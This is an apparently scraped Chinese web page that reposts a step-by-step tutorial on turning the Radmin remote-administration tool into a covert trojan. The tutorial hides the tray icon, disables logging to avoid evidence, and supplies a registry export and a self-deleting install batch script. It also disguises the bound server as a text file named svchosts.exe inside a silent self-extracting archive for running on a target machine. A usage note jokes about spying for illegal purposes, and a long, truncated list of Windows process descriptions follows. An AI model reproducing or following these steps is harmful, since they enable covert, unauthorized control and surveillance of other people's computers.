很多朋友对于radmin影子版和菜鸟求radmin3.2影子版使用教程不太懂,今天就由小编来为大家分享,希望可以帮助到大家,下面一起来看看吧!
菜鸟求radmin3.2影子版使用教程
http://www.xfbbs.com/ArticleShow/143/Article_Show_66555.html
既然Radmin有着商业软件的外衣,那自然杀毒软件也就不会与它为难!但Radmin虽说不会被查杀,但却有着先天的不足——服务端运行后在任务栏有图标显示,且服务端由3个文件组成(1个EXE文件,2个DLL文件),需要人工在服务端填写口令才可以正常连接并操控,而且最令人头痛的是服务端不具备自启动功能。
想到这些,Cytkk眉头微皱,但凭借着多年的技术敏锐感,一款改造后的Radmin服务端形象出现在脑海里,一个完美的木马后门:服务端由单一EXE文件组成,运行后无明显痕迹、无需人工干涉即可自动填写注册信息到注册表,添加自身到系统服务启动项......Cytkk就这么一边构想着,一边将鼠标移到了自己电脑的"开始"菜单上......
改造Radmin
1.Cytkk决定先去除Radmin在服务端运行后的任务栏标志。进入Radmin"服务端设置"中的"设置参数"(见图1),在"隐藏状态栏图标"前打上√,这样原本在服务端运行后会在状态栏有图标的弊端就剔除了。
2.然后根据自己的需要,更改连接端口号,设置成不常用的1986端口。其它地方可不作修改(值得注意的是"日志"选项,千万不要因为错选"保留记录文件"从而留下"罪证"),点击"确定"退出。
3.点选"设置密码"来设置连接时的密码******。
4.一切设置妥当后,Cytkk先在自己机子上安装了服务(因为Radmin工作原理的特殊性,配置信息并非记录在服务端程序内,而是在相关的注册表键值内)。待软件提示成功安装服务后,Cytkk打开注册表编辑器,找到:HKEY_LOCAL_MACHINE\SYSTEM\RAdmin键值,点击"导出注册表"并保存成单独的r_server.reg文件,用记事本打开后,发现其中内容如下(根据设置的不同,参数会略有出入):
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:9c,ee,06,f2,9b,05,13,f8,6e,66,9a,06,00,24,5b,4b(这里是连接密码!其它信息不影响操作,所以不需要掌握)
"Port"=hex:c2,07,00,00(连接服务端时用的端口)
"Timeout"=hex:0a,00,00,00
************************
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00(01表示隐藏系统右下角的图标,如改成00图标就会被显示)
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
5.最后Cytkk麻利地在桌面新建了一个setup.bat批处理文件,在里面添加如下脚本:
@echooff
***********************?(自动安装Radmin服务端)
regedit.exe-s%SystemRoot%\system32\r_server.reg>nul(自动将r_server.reg内的配置信息导入目标机注册表)
netstartr_server>nul(启动r_server服务端服务)
*******************************(删除信息文件)
del%0
注意:文中代码后括号内的内容为注释,勿输入。
超级捆绑
由于Radmin并不是"木马型"监控软件,所以它的服务端是由r_server.exe、raddrv.dll、AdmDll.dll三个文件组成,而一般的"木马"服务端通常只有一个可执行文件。这是个比较麻烦的硬伤,但这难不倒Cytkk,他熟练地运行了一款名为"超级捆绑"的软件。
1.在界面点击右边白色图标,将Radmin服务端的三个文件添加进文件列表,捆绑方式设置成"按文件捆绑方式",然后点击右边的"高级"按钮进入详细设置,在"常规"选项内(图2),将图标自定义为一个文本文件以增加更好的隐蔽性,文件大小则采用默认。
2.随后,Cytkk又将"属性"中的"只读"、"隐藏"和"系统"三项全部选中,这样就使捆绑后的文件更具隐蔽和安全性。
3.Cytkk点击"运行"标签,出现捆绑程序运行设置,将文件分解运行目录设置成"在捆绑后的文件所在目录中运行",窗口状态则设为"隐藏窗口"。
4.他将"参数"页面内的全部个性化设置选项前面的√取消。点击"确定"退回上级窗口,最后设置好捆绑文件输出路径。为了增强隐蔽性,可以将捆绑后的执行文件更名,Cytkk将它命名为svchosts.exe。
5.点击"合并"就完成了服务端的文件捆绑工作。现在的Radmin已经基本上从一款商业化的远程控制软件变成了一个不折不扣的木马了。
善后
到此,Cytkk认为整个改造工作差不多完成了,马上进行关键的收尾工作,即将编辑好的setup.bat以及最先导出的r_server.reg连同捆绑后的svchosts.exe这三个文件用WinRAR打包成自解压程序。
Cytkk进行了如下设置:在"高级自释放选项"中的"常规"选项内释放路径一栏填入"%systemroot%\system32,在"释放后运行"里则需要把setup.bat(注意填写文件扩展名)写上,这样在解压后才会自动执行该批处理程序(如图3)。在"模式"选项里,把第一个模式设置成"全部隐藏",覆盖方式设置成"跳过现有文件",最后将"自释放模块"设置成DOS.SFX的DOS命令行RAR自释放格式(因为取得系统CMDShell后默认的Windows图形控制台不能正常工作)。点击"确定"完成收尾工作。Cytkk最后检查了一下RAR自释放包内的注释(右边灰色窗口内),看到自解压脚本如下:
Path=%systemroot%\system32
**************
Silent=1
Overwrite=2
所有工作已经完成,Cytkk满意地笑了笑,将制作好的打包程序上传到目标计算机运行,随后在自己机子上打开Radmin的客户端,输入目标机IP→连接→输入密码
Radmin Viewer (远程控制)V3.4 影子 软件使用技巧
使用方法:
运行客户端软件“服务端.exe文件”,如下:
这里选择的是“完全控制”,还有很多选项呢,比如传输文件之类的,如果你是用作非法用途,“仅限查看”模式连接进去,可以看到你被控端在做什么呢,哈哈!截个菜单的图:
能否从进程上看是否被Radmin影子版远程监控怎么看
可以,进程里面看到系统进程如果用户名不是system或者administrator的话,基本可以怀疑为中标了,如果进程不太了解的话,装个防毒软件吧,下面给你一些常见进程
[systemprocess]-[systemIdleprocess]-进程信息
进程文件:[systemprocess]or[systemprocess]
进程名称:Windows内存处理系统进程
描述:Windows页面内存管理进程,拥有0级优先。
常见错误:N/A
是否为系统进程:是
alg-alg.exe-进程信息
进程文件:algoralg.exe
进程名称:应用层网关服务
描述:这是一个应用层网关服务用于网络共享。
常见错误:N/A
是否为系统进程:是
csrss-csrss.exe-进程信息
进程文件:csrssorcsrss.exe
进程名称:Client/ServerRuntimeServerSubsystem
描述:客户端服务子系统,用以控制Windows图形相关子系统。
常见错误:N/A
是否为系统进程:是
ddhelp-ddhelp.exe-进程信息
进程文件:ddhelporddhelp.exe
进程名称:DirectDrawHelper
描述:DirectDrawHelper是DirectX这个用于图形服务的一个组成部分。
常见错误:N/A
是否为系统进程:是
dllhost-dllhost.exe-进程信息
进程文件:dllhostordllhost.exe
进程名称:DCOMDLLHost进程
描述:DCOMDLLHost进程支持基于COM对象支持DLL以运行Windows程序。
常见错误:N/A
是否为系统进程:是
explorer-explorer.exe-进程信息
进程文件:explorerorexplorer.exe
进程名称:程序管理
描述:WindowsProgramManager或者WindowsExplorer用于控制Windows图形Shell,包括开
始菜单、任务栏,桌面和文件管理。【资源管理器】
常见错误:N/A
是否为系统进程:是
inetinfo-inetinfo.exe-进程信息
进程文件:inetinfoorinetinfo.exe
进程名称:IISAdminServiceHelper
描述:InetInfo是MicrosoftInternetInfomationServices(IIS)的一部分,用于Debug调
试除错。【msftpsvc,w3svc,iisadmn】
常见错误:N/A
是否为系统进程:是
internat-internat.exe-进程信息
进程文件:internatorinternat.exe
进程名称:InputLocales
描述:这个输入控制图标用于更改类似国家设置、键盘类型和日期格式。【托盘区的拼音图
标】
常见错误:N/A
是否为系统进程:是
kernel32-kernel32.dll-进程信息
进程文件:kernel32orkernel32.dll
进程名称:Windows壳进程
描述:Windows壳进程用于管理多线程、内存和资源。
常见错误:N/A
是否为系统进程:是
lsass-lsass.exe-进程信息
进程文件:lsassorlsass.exe
进程名称:本地安全权限服务
描述:这个本地安全权限服务控制Windows安全机制。管理ip安全策略以及启动
isakmp/oakley(ike)和ip安全驱动程序。
常见错误:N/A
是否为系统进程:是
mdm-mdm.exe-进程信息
进程文件:mdmormdm.exe
进程名称:MachineDebugManager
描述:Debug除错管理用于调试应用程序和MicrosoftOffice中的MicrosoftScriptEditor
脚本编辑器。
常见错误:N/A
是否为系统进程:是
mmtask-mmtask.tsk-进程信息
进程文件:mmtaskormmtask.tsk
进程名称:多媒体支持进程
描述:这个Windows多媒体后台程序控制多媒体服务,例如MIDI。
常见错误:N/A
是否为系统进程:是
mprexe-mprexe.exe-进程信息
进程文件:mprexeormprexe.exe
进程名称:Windows路由进程
描述:Windows路由进程包括向适当的网络部分发出网络请求。
常见错误:N/A
是否为系统进程:是
msgsrv32-msgsrv32.exe-进程信息
进程文件:msgsrv32ormsgsrv32.exe
进程名称:Windows信使服务
描述:Windows信使服务调用Windows驱动和程序管理在启动。
常见错误:N/A
是否为系统进程:是
mstask-mstask.exe-进程信息
进程文件:mstaskormstask.exe
进程名称:Windows计划任务
描述:Windows计划任务用于设定继承在什么时间或者什么日期备份或者运行。【允许程序在
指定时间运行。】
常见错误:N/A
是否为系统进程:是
regsvc-regsvc.exe-进程信息
进程文件:regsvcorregsvc.exe
进程名称:远程注册表服务
描述:远程注册表服务用于访问在远程计算机的注册表。【允许远程注册表操作。(系统服务
)->remoteregister】
常见错误:N/A
是否为系统进程:是
rpcss-rpcss.exe-进程信息
进程文件:rpcssorrpcss.exe
进程名称:RPCPortmapper
描述:Windows的RPC端口映射进程处理RPC调用(远程模块调用)然后把它们映射给指定的服
务提供者。
常见错误:N/A
是否为系统进程:是
services-services.exe-进程信息
进程文件:servicesorservices.exe
进程名称:WindowsServiceController
描述:管理Windows服务。包含很多系统服务
常见错误:N/A
是否为系统进程:是
smss-smss.exe-进程信息
进程文件:smssorsmss.exe
进程名称:SessionManagerSubsystem
描述:该进程为会话管理子系统用以初始化系统变量,MS-DOS驱动名称类似LPT1以及COM,调
用Win32壳子系统和运行在Windows登陆过程。
常见错误:N/A
是否为系统进程:是
snmp-snmp.exe-进程信息
进程文件:snmporsnmp.exe
进程名称:MicrosoftSNMPAgent
描述:Windows简单的网络协议代理(SNMP)用于监听和发送请求到适当的网络部分。【包含
代理程序可以监视网络设备的活动并且向网络控制台工作站汇报】
常见错误:N/A
是否为系统进程:是
spool32-spool32.exe-进程信息
进程文件:spool32orspool32.exe
进程名称:PrinterSpooler
描述:Windows打印任务控制程序,用以打印机就绪。
常见错误:N/A
是否为系统进程:是
spoolsv-spoolsv.exe-进程信息
进程文件:spoolsvorspoolsv.exe
进程名称:PrinterSpoolerService
描述:Windows打印任务控制程序,用以打印机就绪。【将文件加载到内存中以便迟后打印。
】
常见错误:N/A
是否为系统进程:是
stisvc-stisvc.exe-进程信息
进程文件:stisvcorstisvc.exe
进程名称:StillImageService
描述:StillImageService用于控制扫描仪和数码相机连接在Windows。
常见错误:N/A
是否为系统进程:是
svchost-svchost.exe-进程信息
进程文件:svchostorsvchost.exe
进程名称:ServiceHostProcess
描述:ServiceHostProcess是一个标准的动态连接库主机处理服务。【windows2000/xp
的文件保护系统】
常见错误:N/A
是否为系统进程:是
system-system-进程信息
进程文件:systemorsystem
进程名称:WindowsSystemProcess
描述:MicrosoftWindows系统进程。
常见错误:N/A
是否为系统进程:是
taskmon-taskmon.exe-进程信息
进程文件:taskmonortaskmon.exe
进程名称:WindowsTaskOptimizer
描述:windows任务优化器监视你使用某个程序的频率,并且通过加载那些经常使用的程序来
整理优化硬盘。
常见错误:N/A
是否为系统进程:是
tcpsvcs-tcpsvcs.exe-进程信息
进程文件:tcpsvcsortcpsvcs.exe
进程名称:TCP/IPServices
描述:TCP/IPServicesApplication支持透过TCP/IP连接局域网和Internet。【提供在pxe
可远程启动客户计算机上远程安装windows2000professional的能力】
常见错误:N/A
是否为系统进程:是
winlogon-winlogon.exe-进程信息
进程文件:winlogonorwinlogon.exe
进程名称:WindowsLogonProcess
描述:WindowsNT管理用户登陆程序。
常见错误:N/A
是否为系统进程:是
winmgmt-winmgmt.exe-进程信息
进程文件:winmgmtorwinmgmt.exe
进程名称:WindowsManagementService
描述:WindowsManagementService透过WindowsManagementInstrumentationdata(WMI)
技术处理来自应用客户端的请求。【提供系统管理信息(系统服务)。】
常见错误:N/A
是否为系统进程:是
[Lasteditedby一坨尸on2004-9-27at22:03]
一般程序
=======================
absr-absr.exe-进程信息
进程文件:absrorabsr.exe
进程名称:Backdoor.AutoupderVirus
描述:这个进程是Backdoor.Autoupder后门病毒程序创建的。
常见错误:N/A
是否为系统进程:否
acrobat-acrobat.exe-进程信息
进程文件:acrobatoracrobat.exe
进程名称:AdobeAcrobat
描述:AcrobatWriter用于创建PDF文档。
常见错误:N/A
是否为系统进程:否
acrord32-acrord32.exe-进程信息
进程文件:acrord32oracrord32.exe
进程名称:AcrobatReader
描述:AcrobatReader是一个用于阅读PDF文档的软件。
常见错误:N/A
是否为系统进程:否
agentsvr-agentsvr.exe-进程信息
进程文件:agentsvroragentsvr.exe
进程名称:OLEautomationserver
描述:OLEAutomationServer是MicrosoftAgent的一部分。
常见错误:N/A
是否为系统进程:否
aim-aim.exe-进程信息
进程文件:aimoraim.exe
进程名称:AOLInstantMessenger
描述:AOLInstantMessenger是一个在线聊天和即时通讯IM软件客户端。
常见错误:N/A
是否为系统进程:否
airsvcu-airsvcu.exe-进程信息
进程文件:airsvcuorairsvcu.exe
进程名称:MicrosoftMediaManager
描述:OLE这是一个用于在硬盘上建立索引文件和文件夹,在MicrosoftMediaManager媒体
管理启动时运行的进程。它可以在控制面板被禁用。
常见错误:N/A
是否为系统进程:否
alogserv-alogserv.exe-进程信息
进程文件:alogservoralogserv.exe
进程名称:McAfeeVirusScan
描述:McAfeeVirusScan是一个反病毒软件用于扫描你的文档和E-mail中的病毒。
常见错误:N/A
是否为系统进程:否
avconsol-avconsol.exe-进程信息
进程文件:avconsoloravconsol.exe
进程名称:McAfeeVirusScan
描述:McAfeeVirusScan是一个反病毒软件用于扫描你的文档和E-mail中的病毒。
常见错误:N/A
是否为系统进程:否
avsynmgr-avsynmgr.exe-进程信息
进程文件:avsynmgroravsynmgr.exe
进程名称:McAfeeVirusScan
描述:McAfeeVirusScan是一个反病毒软件用于扫描你的文档和E-mail中的病毒。
常见错误:N/A
是否为系统进程:否
backWeb-backWeb.exe-进程信息
进程文件:backWeborbackWeb.exe
进程名称:BackwebAdware
描述:Backweb是一个Adware(广告插件,一般是由于安装某些免费软件而伴随安装上的程序
)来自BackwebTechnologies。
常见错误:N/A
是否为系统进程:否
bcb-bcb.exe-进程信息
进程文件:bcborbcb.exe
进程名称:BorlandC++Builder
描述:BorlandC++Builder
常见错误:N/A
是否为系统进程:否
calc-calc.exe-进程信息
进程文件:calcorcalc.exe
进程名称:Calculator
描述:MicrosoftWindows计算器程序
常见错误:N/A
是否为系统进程:否
ccapp-ccapp.exe-进程信息
进程文件:ccapporccapp.exe
进程名称:SymantecCommonClient
描述:Symantec公用应用客户端包含在NortonAntiVirus2003和NortonPersonalFirewall2003。
常见错误:N/A
是否为系统进程:否
cdplayer-cdplayer.exe-进程信息
进程文件:cdplayerorcdplayer.exe
进程名称:CDPlayer
描述:MicrosoftWindows包含的CD播放器
常见错误:N/A
是否为系统进程:否
charmap-charmap.exe-进程信息
进程文件:charmaporcharmap.exe
进程名称:WindowsCharacterMap
描述:Windows字符映射表用来帮助你寻找不常见的字符。
常见错误:N/A
是否为系统进程:否
cidaemon-cidaemon.exe-进程信息
进程文件:cidaemonorcidaemon.exe
进程名称:MicrosoftIndexingService
描述:在后台运行的Windows索引服务,用于帮助你搜索文件在下次变得更快。
常见错误:N/A
是否为系统进程:否
cisvc-cisvc.exe-进程信息
进程文件:cisvcorcisvc.exe
进程名称:MicrosoftIndexServiceHelper
描述:MicrosoftIndexServiceHelper监视MicrosoftIndexingService(cidaemon.exe)的内存占用情况,如果cidaemon.exe内存使用超过了40M,则自动重新启动该进程。【索引服务】
常见错误:N/A
是否为系统进程:否
cmd-cmd.exe-进程信息
进程文件:cmdorcmd.exe
进程名称:WindowsCommandPrompt
描述:Windows控制台程序。不像旧的command.com,cmd.exe是一个32位的命令行使用在WinNT/2000/XP。
常见错误:N/A
是否为系统进程:否
cmesys-cmesys.exe-进程信息
进程文件:cmesysorcmesys.exe
进程名称:GatorGAINAdware
描述:GatorGAIN是一个Adware插件(广告插件,一般是由于安装某些免费软件而伴随安装上的程序)。
常见错误:N/A
是否为系统进程:否
ctfmon-ctfmon.exe-进程信息
进程文件:ctfmonorctfmon.exe
进程名称:AlternativeUserInputServices
描述:控制AlternativeUserInputTextProcessor(TIP)和MicrosoftOffice语言条。Ctfmon.exe提供语音识别、手写识别、键盘、翻译和其它用户输入技术的支持。
常见错误:N/A
是否为系统进程:否
ctsvccda-ctsvccda.exe-进程信息
进程文件:ctsvccdaorctsvccda.exe
进程名称:CreateCD-ROMServices
描述:在Win9X创建CD-ROM访问服务。
常见错误:N/A
是否为系统进程:否
cutftp-cutftp.exe-进程信息
进程文件:cutftporcutftp.exe
进程名称:CuteFTP
描述:CuteFTP是一个流行的FTP客户端用于从FTP服务器上传/下载文件。
常见错误:N/A
是否为系统进程:否
defwatch-defwatch.exe-进程信息
进程文件:defwatchordefwatch.exe
进程名称:NortonAntiVirus
描述:NortonAnti-Virus扫描你的文件和email以检查病毒。
常见错误:N/A
是否为系统进程:否
devldr32-devldr32.exe-进程信息
进程文件:devldr32ordevldr32.exe
进程名称:CreateDeviceLoader
描述:CreativeDeviceLoader属于CreateSoundblaster驱动。
常见错误:N/A
是否为系统进程:否
directcd-directcd.exe-进程信息
进程文件:directcdordirectcd.exe
进程名称:AdaptecDirectCD
描述:AdaptecDirectCD是一个用文件管理器式的界面,烧录文件到光盘的软件。
常见错误:N/A
是否为系统进程:否
dreamweaver-dreamweaver.exe-进程信息
进程文件:dreamweaverordreamweaver.exe
进程名称:MacromediaDreamWeaver
描述:MacromediaDreamWeaver是一个HTML编辑器用于创建站点和其它类别的HTML文档。
常见错误:N/A
是否为系统进程:否
em_exec-em_exec.exe-进程信息
进程文件:em_execorem_exec.exe
进程名称:LogitechMouseSettings
描述:这是LogitechMouseWare状态栏图标的进程,用于用户访问控制鼠标属性和察
看MouseWare帮助。
常见错误:N/A
是否为系统进程:否
excel-excel.exe-进程信息
进程文件:excelorexcel.exe
进程名称:MicrosoftExcel
描述:MicrosoftExcel是一个电子表格程序包括在MicrosoftOffice中。
常见错误:N/A
是否为系统进程:否
findfast-findfast.exe-进程信息
进程文件:findfastorfindfast.exe
进程名称:MicrosoftOfficeIndexing
描述:MicrosoftOffice索引程序,用于提高MicrosoftOffice索引Office文档的速度。
常见错误:N/A
是否为系统进程:否
frontpage-frontpage.exe-进程信息
进程文件:frontpageorfrontpage.exe
进程名称:MicrosoftFrontPage
描述:MicrosoftFrontPage是一个HTML编辑器用于创建站点和其它类别的HTML文档。
常见错误:N/A
是否为系统进程:否
gmt-gmt.exe-进程信息
进程文件:gmtorgmt.exe
进程名称:GatorSpywareComponent
描述:GatorSpyware是一个广告插件,随Gator安装和启动。
常见错误:N/A
是否为系统进程:否
hh-hh.exe-进程信息
进程文件:hhorhh.exe
进程名称:GatorWindowsHelp
描述:WindowsHelp程序用以打开帮助文件和文档,包括在很多Windows程序中。
常见错误:N/A
是否为系统进程:否
hidserv-hidserv.exe-进程信息
进程文件:hidservorhidserv.exe
进程名称:MicrosoftHumanInterfaceDeviceAudioService
描述:后台服务,用来支持USB音效部件和USB多媒体键盘。
常见错误:N/A
是否为系统进程:否
icq-icq.exe-进程信息
进程文件:icqoricq.exe
进程名称:ICQ
描述:ICQ是一个在线聊天和即时通讯客户端。
常见错误:N/A
是否为系统进程:否
iexplore-iexplore.exe-进程信息
进程文件:iexploreoriexplore.exe
进程名称:InternetExplorer
描述:MicrosoftInternetExplorer网络浏览器透过HTTP访问WWW万维网。
常见错误:N/A
是否为系统进程:否
irmon-irmon.exe-进程信息
进程文件:irmonorirmon.exe
进程名称:WindowsInfraredPortMonitor
描述:WindowsIRMon进程用以监视红外线端口设备。
常见错误:N/A
是否为系统进程:否
kodakimage-kodakimage.exe-进程信息
进程文件:kodakimageorkodakimage.exe
进程名称:Imaging
描述:KodakImaging是一个图片察看软件。包括在Windows,用以打开图像文件。
常见错误:N/A
是否为系统进程:否
loadqm-loadqm.exe-进程信息
进程文件:loadqmorloadqm.exe
进程名称:MSNQueueManagerLoader
描述:MSNQueueManagerLoader被随着MSNExplorer和MSNMessenger安装。他在一些时候
会占用很多系统资源。
常见错误:N/A
是否为系统进程:否
loadwc-loadwc.exe-进程信息
进程文件:loadwcorloadwc.exe
进程名称:LoadWebCheck
描述:LoadWebCheck用以定制一些InternetExplorer的设定,添加、删除或者更新用
户profiles设定。
常见错误:N/A
是否为系统进程:否
mad-mad.exe-进程信息
进程文件:madormad.exe
进程名称:SystemAttendantService
描述:SystemAttendantService是MicrosoftExchangeServer的后台程序。它用以读
取MicrosoftExchange的DLLs文件,写log信息和生成离线地址薄。
常见错误:N/A
是否为系统进程:否
mcshield-mcshield.exe-进程信息
进程文件:mcshieldormcshield.exe
进程名称:McAfeeVirusScan
描述:McAfeeVirusScan是一个反病毒软件用以扫描你的文件和email中的病毒。
常见错误:N/A
是否为系统进程:否
mgabg-mgabg.exe-进程信息
进程文件:mgabgormgabg.exe
进程名称:MatroxBIOSGuard
描述:MatroxBIOS守护进程。
常见错误:N/A
是否为系统进程:否
mmc-mmc.exe-进程信息
进程文件:mmmcormmc.exe
进程名称:MicrosoftManagementConsole
描述:MicrosoftManagementConsole管理控制程序集成了很多的系统控制选项。例如设备
管理(系统、硬件)或者计算机权限控制(Administrative管理工具)。
常见错误:N/A
是否为系统进程:否
mobsync-mobsync.exe-进程信息
进程文件:mobsyncormobsync.exe
进程名称:MicrosoftSynchronizationManager
描述:InternetExplorer的一个组成部分,用以在后台同步离线察看页面。
常见错误:N/A
是否为系统进程:否
mplayer-mplayer.exe-进程信息
进程文件:mplayerormplayer.exe
进程名称:WindowsMediaPlayer
描述:WindowsMediaPlayer是一个用以打开音乐、声音和视频文件的软件。
常见错误:N/A
是否为系统进程:否
mplayer2-mplayer2.exe-进程信息
进程文件:mplayer2ormplayer2.exe
进程名称:WindowsMediaPlayer
描述:WindowsMediaPlayer是一个用以打开音乐、声音和视频文件的软件。
常见错误:N/A
是否为系统进程:否
msaccess-msaccess.exe-进程信息
进程文件:msaccessormsaccess.exe
进程名称:MicrosoftAccess
描述:MicrosoftAccess是一个数据库软件包括在MicrosoftOffice。
常见错误:N/A
是否为系统进程:否
msbb-msbb.exe-进程信息
进程文件:msbbormsbb.exe
进程名称:MSBBWeb3000SpywareApplication
描述:MSBBWeb3000Spyware是包括在一些adware产品中,利用注册表随Windows启动。
常见错误:N/A
是否为系统进程:否
msdtc-msdtc.exe-进程信息
进程文件:msdtcormsdtc.exe
进程名称:DistributedTransactionCoordinator
描述:MicrosoftDistributedTransactionCoordinator控制多个服务器的传输,被安装在
MicrosoftPersonalWebServer和MicrosoftSQLServer。【并列事务,是分布于两个以上
的数据库,消息队列,文件系统或其它事务保护护资源管理器】
常见错误:N/A
是否为系统进程:否
msiexec-msiexec.exe-进程信息
进程文件:msiexecormsiexec.exe
进程名称:WindowsInstallerComponent
描述:WindowsInstaller的一部分。用来帮助WindowsInstallerpackagefiles(MSI)格
式的安装文件。【依据.msi文件中包含的命令来安装、修复以及删除软件】
常见错误:N/A
是否为系统进程:否
msimn-msimn.exe-进程信息
进程文件:msimnormsimn.exe
进程名称:MicrosoftOutlookExpress
描述:MicrosoftOutlookExpress是一个Email和新闻组客户端包括在MicrosoftWindows。
常见错误:N/A
是否为系统进程:否
msmsgs-msmsgs.exe-进程信息
进程文件:msmsgsormsmsgs.exe
进程名称:MSNMessengerTraybarProcess
描述:MSNMessenger是一个在线聊天和即时通讯客户端。
常见错误:N/A
是否为系统进程:否
msoobe-msoobe.exe-进程信息
进程文件:msoobeormsoobe.exe
进程名称:WindowsProductActivation
描述:WindowsXPLicense的ProductActivation产品激活程序。
常见错误:N/A
是否为系统进程:否
mspaint-mspaint.exe-进程信息
进程文件:mspaintormspaint.exe
进程名称:MicrosoftPaint
描述:MicrosoftPaint画图是一个图像编辑器包括在MicrosoftWindows,它能够编辑bmp图
像。
常见错误:N/A
是否为系统进程:否
mspmspsv-mspmspsv.exe-进程信息
进程文件:mspmspsvormspmspsv.exe
进程名称:WMDMPMSPService
描述:WindowsMediaPlayer7需要安装的HelperService。
常见错误:N/A
是否为系统进程:否
mysqld-nt-mysqld-nt.exe-进程信息
进程文件:mysqld-ntormysqld-nt.exe
进程名称:MySQLDaemon
描述:MySQLDaemon控制访问MySQL数据库。
常见错误:N/A
是否为系统进程:否
navapsvc-navapsvc.exe-进程信息
进程文件:navapsvcornavapsvc.exe
进程名称:NortonAntiVirusAuto-ProtectService
描述:NortonAnti-Virus扫描你的文件和email中的病毒。
常见错误:N/A
是否为系统进程:否
navapw32-navapw32.exe-进程信息
进程文件:navapw32ornavapw32.exe
进程名称:NortonAntiVirusAgent
描述:NortonAnti-Virus扫描你的文件和email中的病毒。
常见错误:N/A
是否为系统进程:否
ndetect-ndetect.exe-进程信息
进程文件:ndetectorndetect.exe
进程名称:ICQNdetectAgent
描述:ICQNdetectAgent是ICQ用来侦测网络连接的程序。
常见错误:N/A
是否为系统进程:否
netscape-netscape.exe-进程信息
进程文件:netscapeornetscape.exe
进程名称:Netscape
描述:Netscape网络浏览器通过HTTP浏览WWW万维网。
常见错误:N/A
是否为系统进程:否
notepad-notepad.exe-进程信息
进程文件:notepadornotepad.exe
进程名称:Notepad
描述:Notepad字符编辑器用于打开文档。在Windows中附带。
常见错误:N/A
是否为系统进程:否
ntbackup-ntbackup.exe-进程信息
进程文件:ntbackuporntbackup.exe
进程名称:WindowsBackup
描述:Windows备份工具用于备份文件和文件夹。
常见错误:N/A
是否为系统进程:否
ntvdm-ntvdm.exe-进程信息
进程文件:ntvdmorntvdm.exe
进程名称:Windows16-bitVirtualMachine
描述:WindowsVirtualMachine是为了兼容旧的16位Windows和DOS程序而设置的虚拟机。
常见错误:N/A
是否为系统进程:否
nvsvc32-nvsvc32.exe-进程信息
进程文件:nvsvc32ornvsvc32.exe
进程名称:NVIDIADriverHelperService
描述:NVIDIADriverHelperService在NVIDA显卡驱动中被安
OK,关于radmin影子版和菜鸟求radmin3.2影子版使用教程的内容到此结束了,希望对大家有所帮助。
